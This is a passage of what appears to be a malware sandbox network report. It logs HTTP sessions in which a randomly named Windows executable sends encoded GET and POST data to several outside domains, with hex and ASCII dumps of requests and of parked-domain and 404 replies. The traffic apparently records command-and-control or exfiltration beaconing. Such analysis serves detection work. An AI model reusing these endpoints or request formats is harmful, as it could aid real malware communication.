                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6a 37 41 44 38 59 71 51 6c 51 4f 72 6d 35 6d 68 2f 5a 56 56 7a 48 6d 72 2b 2b 72 32 4c 6f 39 72 43 4b 6d 51 2f 59 4e 33 76 4f 36 69 61 59 39 48 56 56 6c 36 30 39 64 74 59 49 6c 77 4e 76 50 51 58 54 52 4c 51 7a 35 37 56 34 58 75 62 73 52 48 64 4f 51 58 75 79 6b 6c 6d 51 62 36 78 47 56 78 4e 75 55 78 70 79 6f 4b 70 6f 77 54 52 46 63 4c 54 74 37 64 76 38 4d 36 4d 34 4a 78 7a 4f 70 77 59 4e 42 59 45 62 65 68 45 4a 51 74 56 78 76 43 65 47 61 33 7a 4e 33 32 4d 6e 39 72 69 45 45 4d 31 4e 65 31 42 46 56 70 41 4c 70 37 58 4c 62 30 35 59 2b 58 7a 71 47 54 74 73 77 61 50 6a 70 55 39 70 75 66 36 69 55 34 47 64 62 33 52 62 6f 63 56 63 39 39 55 63 37 4e 71 4d 54 63 70 73 36 74 42 50 42 74 46 4f 37 59 5a 37 7a 6c 49 51 50 6c 72 73 65 53 36 59 53 38 43 45 6c 53 39 51 66 5a 30 74 74 76 6c 4e 54 32 50 65 49 37 73 50 67 45 47 49 77 37 4a 76 53 4b 63 2b 37 47 75 54 74 37 63 7a 56 7a 38 49 68 68 77 35 6e 61 2f 37 66 71 4b 41 6e 44 70 70 65 47 74 61 67 5a 72 69 74 54 57 62 33 61 55 57 72 6c 69 76 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=j7AD8YqQlQOrm5mh/ZVVzHmr++r2Lo9rCKmQ/YN3vO6iaY9HVVl609dtYIlwNvPQXTRLQz57V4XubsRHdOQXuyklmQb6xGVxNuUxpyoKpowTRFcLTt7dv8M6M4JxzOpwYNBYEbehEJQtVxvCeGa3zN32Mn9riEEM1Ne1BFVpALp7XLb05Y+XzqGTtswaPjpU9puf6iU4Gdb3RbocVc99Uc7NqMTcps6tBPBtFO7YZ7zlIQPlrseS6YS8CElS9QfZ0ttvlNT2PeI7sPgEGIw7JvSKc+7GuTt7czVz8Ihhw5na/7fqKAnDppeGtagZritTWb3aUWrlivJCmo0HORgbaZyFRq0Q1gGuXmYMLw9AdI5ydvKS9sk30ed20w7DO5GFksF19Rfz/ZTCWfHPQXoSfHHn2aH+Rfc9xD9giSXGumsNTKT9LiO8jVBT6T67lKfdAnawR0Ltknz0j91GmmqSlG39uVB2fTRG2rUUpupDjtT1Us+cTvkWVQMz90HNAX7MqESdakZ/XEhT4cNo669uP10+7FsJCk9WZXuE2mOS+O5t9JEQ0N6CBK6N2qorXd6x+m8uAZbAubg3gShzWiUtGMiOhDV6H2N3ZIcHwtbFjdWQIbatP8+aEFA7uWNgqsgOQmcZ32ypHN5DbtpW13A7uSOLfscoQsNtw8o+EbonzR/tD9bkmDId8IsfvFzVcHurD36ZgwMaxrS+hRDlK1ptJEivhHKt4l154v4ICmGSo7Bwys7WReizdpGX0qby+Bu38e4iUEMuFoUioAMFUOdkleS1XIC34ExuNllDFa/8y81sb1XXp3bYQd3PsV0+UHEpseP5+kCaPkIpK/ddGybMbrisPgyZXZCUwBxnlH/5zeKJg8yLnhEZdPbN0sa1DKz77AtIix5i7HEJCd9sW+Or40DEx9obnNEBFr0+qh3yvSTuGa2illRepB2TaAwEpLi6a0Y3Vd7GsWW7VojlzubHRDUnoVy0/7opBwN26+q0epmo [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.124973484.32.84.32805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:36:59.864487886 CET517OUTGET /3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.samundri.online
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:37:00.952725887 CET1236INHTTP/1.1 200 OK
                                                                            Date: Fri, 06 Dec 2024 16:37:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 9973
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Server: hcdn
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            x-hcdn-request-id: 47587e2683e53bfde7696e37b6211972-bos-edge1
                                                                            Expires: Fri, 06 Dec 2024 16:36:59 GMT
                                                                            Cache-Control: no-cache
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                            Dec 6, 2024 17:37:00.952761889 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                            Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                            Dec 6, 2024 17:37:00.952775002 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                            Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                            Dec 6, 2024 17:37:00.952843904 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                            Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                            Dec 6, 2024 17:37:00.952863932 CET896INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                            Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                            Dec 6, 2024 17:37:00.952883959 CET1236INData Raw: 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20 54 61 6b 65 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64 65 64 20 73 74 65 70 73 20 62 65 6c 6f 77 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 79 6f 75 72 20 6a 6f
                                                                            Data Ascii: using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=domain-default-img.svg></div><div class=col-xs-12><div class=section-title>What's next?</div></div><div class="clearfix c
                                                                            Dec 6, 2024 17:37:00.952896118 CET1236INData Raw: 65 6d 65 6e 74 20 70 61 67 65 20 6f 66 20 79 6f 75 72 20 48 6f 73 74 69 6e 67 65 72 20 61 63 63 6f 75 6e 74 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d
                                                                            Data Ascii: ement page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){
                                                                            Dec 6, 2024 17:37:00.952981949 CET1236INData Raw: 6e 67 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 70 75 74 20 3e 3d 20 30 78 38 30 22 29 3b 6d 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 29 7d 66 6f 72 28 64 3d 30 3c 63 3f 63 2b 31 3a 30 3b 64 3c 45 3b 29 7b 66 6f
                                                                            Data Ascii: ngeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("p
                                                                            Dec 6, 2024 17:37:00.952994108 CET764INData Raw: 68 3d 6c 2c 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68
                                                                            Data Ascii: h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.1249750209.74.77.107805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:06.896686077 CET781OUTPOST /4ii9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.happyjam.life
                                                                            Origin: http://www.happyjam.life
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.happyjam.life/4ii9/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 6f 41 6c 67 71 4c 6e 78 35 74 65 4b 58 62 4e 49 65 53 4a 71 6a 35 6c 46 7a 57 50 35 4e 53 65 56 65 76 45 59 4d 67 43 58 4c 6a 33 34 51 42 37 37 42 2f 58 7a 46 79 62 51 49 30 43 2b 62 48 57 39 67 65 78 47 74 66 4e 30 67 6e 51 48 77 68 48 6a 57 75 78 73 6f 38 63 65 53 6c 31 47 46 39 41 42 4c 52 7a 31 2b 64 7a 55 73 47 38 45 32 57 64 44 44 56 46 43 30 34 68 45 49 62 58 46 42 55 4f 41 34 48 4e 74 39 4c 38 61 5a 35 7a 72 6e 68 46 4c 64 49 62 4b 74 55 71 37 62 63 33 49 4b 66 68 79 43 79 46 6e 48 57 61 45 77 6b 6f 44 72 51 30 77 34 4d 65 78 4e 67 3d 3d
                                                                            Data Ascii: BHptZ6F=OAifYW+lPdFdoAlgqLnx5teKXbNIeSJqj5lFzWP5NSeVevEYMgCXLj34QB77B/XzFybQI0C+bHW9gexGtfN0gnQHwhHjWuxso8ceSl1GF9ABLRz1+dzUsG8E2WdDDVFC04hEIbXFBUOA4HNt9L8aZ5zrnhFLdIbKtUq7bc3IKfhyCyFnHWaEwkoDrQ0w4MexNg==
                                                                            Dec 6, 2024 17:37:08.102135897 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:07 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.1249756209.74.77.107805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:09.570456982 CET801OUTPOST /4ii9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.happyjam.life
                                                                            Origin: http://www.happyjam.life
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.happyjam.life/4ii9/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 71 68 56 67 6f 73 4c 78 6f 64 65 4a 62 37 4e 49 58 79 49 74 6a 35 70 46 7a 58 4b 68 4d 67 4b 56 66 4e 63 59 65 55 75 58 65 6a 33 34 59 68 37 2b 63 76 57 65 46 79 58 59 49 32 47 2b 62 48 53 39 67 63 70 47 71 6f 5a 33 6a 58 51 46 2f 42 48 68 5a 4f 78 73 6f 38 63 65 53 6c 68 73 46 39 59 42 4c 68 6a 31 2b 2f 4c 58 76 47 38 4c 2f 32 64 44 55 46 46 65 30 34 68 69 49 61 61 53 42 58 32 41 34 43 78 74 38 61 38 5a 58 4a 79 67 70 42 46 41 57 36 44 47 31 6c 65 6e 59 2b 6a 64 55 61 46 33 44 30 49 39 59 6b 53 53 6c 6e 38 4f 6d 48 4e 41 31 50 6a 34 57 6b 77 32 69 35 63 34 79 35 54 52 43 2b 31 45 55 68 6c 68 63 4c 49 3d
                                                                            Data Ascii: BHptZ6F=OAifYW+lPdFdqhVgosLxodeJb7NIXyItj5pFzXKhMgKVfNcYeUuXej34Yh7+cvWeFyXYI2G+bHS9gcpGqoZ3jXQF/BHhZOxso8ceSlhsF9YBLhj1+/LXvG8L/2dDUFFe04hiIaaSBX2A4Cxt8a8ZXJygpBFAW6DG1lenY+jdUaF3D0I9YkSSln8OmHNA1Pj4Wkw2i5c4y5TRC+1EUhlhcLI=
                                                                            Dec 6, 2024 17:37:10.795449018 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:10 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.1249767209.74.77.107805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:12.246458054 CET1814OUTPOST /4ii9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.happyjam.life
                                                                            Origin: http://www.happyjam.life
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.happyjam.life/4ii9/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 71 68 56 67 6f 73 4c 78 6f 64 65 4a 62 37 4e 49 58 79 49 74 6a 35 70 46 7a 58 4b 68 4d 67 79 56 66 2b 55 59 4d 46 75 58 59 54 33 34 53 42 37 2f 63 76 57 6d 46 78 6e 63 49 32 61 41 62 42 4f 39 79 70 31 47 76 5a 5a 33 30 6e 51 46 30 68 48 38 57 75 78 35 6f 38 73 61 53 6d 5a 73 46 39 59 42 4c 6a 72 31 70 39 7a 58 6a 6d 38 45 32 57 64 48 44 56 46 69 30 34 35 63 49 61 65 43 43 6d 57 41 34 69 42 74 2b 70 55 5a 56 70 79 69 6b 68 45 41 57 36 2b 59 31 6c 79 72 59 2f 48 33 55 63 31 33 43 69 56 41 4e 52 79 4c 68 6e 74 32 30 30 70 48 77 39 75 31 50 30 45 59 68 71 6b 4b 35 5a 44 36 41 2f 51 67 41 79 35 56 4c 4d 6f 4a 31 52 6e 71 6b 4d 78 49 73 70 5a 65 71 57 68 51 41 34 57 79 41 47 43 37 50 4e 74 75 50 6a 54 75 45 46 68 39 57 4c 35 6f 35 65 62 66 50 7a 67 43 53 48 77 69 55 6e 63 6a 37 32 32 65 4d 4c 57 76 7a 37 36 48 70 52 2b 49 48 68 71 59 47 4c 37 32 4b 76 46 77 48 50 59 4d 52 42 65 6d 63 75 76 73 57 33 73 6a 30 50 45 6e 64 43 53 6f 50 54 7a 62 44 6d [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=OAifYW+lPdFdqhVgosLxodeJb7NIXyItj5pFzXKhMgyVf+UYMFuXYT34SB7/cvWmFxncI2aAbBO9yp1GvZZ30nQF0hH8Wux5o8saSmZsF9YBLjr1p9zXjm8E2WdHDVFi045cIaeCCmWA4iBt+pUZVpyikhEAW6+Y1lyrY/H3Uc13CiVANRyLhnt200pHw9u1P0EYhqkK5ZD6A/QgAy5VLMoJ1RnqkMxIspZeqWhQA4WyAGC7PNtuPjTuEFh9WL5o5ebfPzgCSHwiUncj722eMLWvz76HpR+IHhqYGL72KvFwHPYMRBemcuvsW3sj0PEndCSoPTzbDmXxSmxBNK6ieO7EMUui/0yygEuN5esYI7CqcoLTSyr9F1FK7jL48zItNc6V3LexpL7Vd1vE30hYADm2rlebuT7fQiHKq6wQRdr/qX50UyOT9Vs2r+bys707rEhwZF0aiJeOs9V0A76of8Rg2bZMpHQJG76hTF/Si3lBKfU4FEGAx1kj/p0xwxo7ift8/RvPUiG6fjB79rYzFLBKfz5Pdx/Eu3BEEqk/6c2PpBa41PSQuGyTho3xC9hyf/cUz2dAzqE3yvkIM+T4YoRZyAW8kCcfdYKb83j/Q3+E3fjA3N1wVKcamoX06fANlrgTWHgEA3LJd7qYNPamOV29G/xmlmY/0AZuqQGdFnu917Dv+bZLEvi3lRTvyw+SaliigCi64gKgPW5tsjT79b6mfnfKmYUEz+Z40te/2Ss91SYvXKql5i2lFFSVF03GsfJhtvI5FcVDbzRZoyiZrELNijilXuk/d+T2mmpwcpD7WEph+jWArbQyHSn8JDvA8Elb3ONGy+oSVv7eckB1QI9Uv41f9mQZT8z0giFYDWMPUkDOD+Ubo3b6TJkl5wuKFWKqkyTGRqFdtf7QRidQDKoku0goFI6RWgZu/wuhaBds5e6zDsu0WF/9dy24mCB2+DI4fAm4cClEsx8ykX2PMdUx0diYmpUgA4c1LNlC45BJ [TRUNCATED]
                                                                            Dec 6, 2024 17:37:13.493470907 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:13 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


